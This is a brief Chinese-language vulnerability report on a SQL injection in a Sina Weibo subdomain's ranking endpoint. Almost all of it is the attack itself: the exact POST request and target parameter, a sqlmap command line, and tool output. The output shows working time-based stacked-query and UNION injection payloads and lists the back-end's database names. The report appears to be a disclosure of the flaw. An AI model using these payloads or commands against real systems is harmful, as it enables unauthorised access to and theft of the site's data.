新浪微博某分站再次发现一枚SQL注入

POST: http://v6.bang.weibo.com/aj/gongyi/rank?ajwvr=6&__rnd=1460968054871

period=day&pagesize=20&page=2&domainId=a&_t=0

referer: http://v6.bang.weibo.com

python sqlmap.py -r ./post.txt -p domainId --dbs

sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: domainId (POST)
     Type: stacked queries
     Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
     Payload: period=day&pagesize=20&page=2&domainId=a';(SELECT * FROM (SELECT(SLEEP(5)))wNHv)#&_t=0
 
     Type: UNION query
     Title: Generic UNION query (NULL) - 14 columns
     Payload: period=day&pagesize=20&page=2&domainId=a' UNION ALL SELECT NULL,NULL,CONCAT(0x717a707071,0x48585a61524871536143,0x716a7a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &_t=0
 ---
 [23:27:18] [INFO] the back-end DBMS is MySQL
 back-end DBMS: MySQL 5.0.11
 [23:27:18] [INFO] fetching database names
 [23:27:18] [INFO] the SQL query used returns 3 entries
 [23:27:18] [INFO] resumed: information_schema
 [23:27:18] [INFO] resumed: test
 [23:27:18] [INFO] resumed: top
 available databases [3]:                                                       
 [*] information_schema
 [*] test
 [*] top